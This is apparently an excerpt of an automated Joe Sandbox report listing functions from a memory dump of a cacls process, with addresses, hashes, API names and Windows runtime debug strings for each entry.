                                                  • Instruction Fuzzy Hash: A92110B084069CDACF01DFD1D998AEEBFB0FB22308F21404AC1293F255D77809468F44
                                                  Function 034D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                  • Instruction ID: 468b5861d96cfdf91a7dfac1844808e15709f4e2af23eeab1847e096c214dbb6
                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                  • Instruction Fuzzy Hash: 1A022475508341AFD304CF19C4A0A6BFBE5EFC8700F458A2EF9998B264DB35E905CB56
                                                  Function 0344B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: eec78eb6c2c870318773882f6143d1fe98e28209c4373ee1db0bc4665ad3f2f8
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: 5F81AE34E052499EFF24CF68C9917AEBBA6EF45320F1C416BD8E1AF390C634C8418B59
                                                  Function 034B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: 7add6141985a12b98fcd44ce41e34140d8686f4ddd5db0ee1179eeadf915d84f
                                                  • Instruction ID: b0ab8caab5872df345d8de9e0613ab01edc0fb8a411ac05922e75dbd830e7817
                                                  • Opcode Fuzzy Hash: 7add6141985a12b98fcd44ce41e34140d8686f4ddd5db0ee1179eeadf915d84f
                                                  • Instruction Fuzzy Hash: DF21817AE00219AFDB10DF69D840AEFB7F8EF54640F48052BE915EB200E770D9028BA5
                                                  Function 0342F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034702E7
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034702BD
                                                  • RTL: Re-Waiting, xrefs: 0347031E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 6b5a6948a0a7379d2753aecc149b39c9e923a138483ec1500c282d919b780d17
                                                  • Instruction ID: 83ae744e303a8763da7a6f3b023439a1e8b13053d58ba1b3f89f986e860474e4
                                                  • Opcode Fuzzy Hash: 6b5a6948a0a7379d2753aecc149b39c9e923a138483ec1500c282d919b780d17
                                                  • Instruction Fuzzy Hash: 76E19A316047419FD724CF28C884B6ABBE0FB84714F980A6EF5A59F3A1D774D849CB4A
                                                  Function 034B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 12f02d8ef60a3c4fc6b66b84be54df938e9a16056fcd0f943af479c7acd165a2
                                                  • Instruction ID: 8dd1a7deea5ba9094bebe29cf2ce4536602eb435b5661f26c8dadad82dcf7d62
                                                  • Opcode Fuzzy Hash: 12f02d8ef60a3c4fc6b66b84be54df938e9a16056fcd0f943af479c7acd165a2
                                                  • Instruction Fuzzy Hash: 46315476A002199FDB60DF39CC40BEFB7B8EB44610F44595AE849EB240EB709A558BB4
                                                  Function 03409126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: c24a89b0086f87d5e32bd385ee54f37be05a43a5fc732713fca88ad58a101ccd
                                                  • Instruction ID: 2b1da36076f1a9f5bda277a2baabbb098a0ee2ee9b2d3fe690a33689994254bb
                                                  • Opcode Fuzzy Hash: c24a89b0086f87d5e32bd385ee54f37be05a43a5fc732713fca88ad58a101ccd
                                                  • Instruction Fuzzy Hash: A5813975E012699FDB31DF54CC44BEAB6B8AB08710F0445EBE919BB290D7709E80CFA5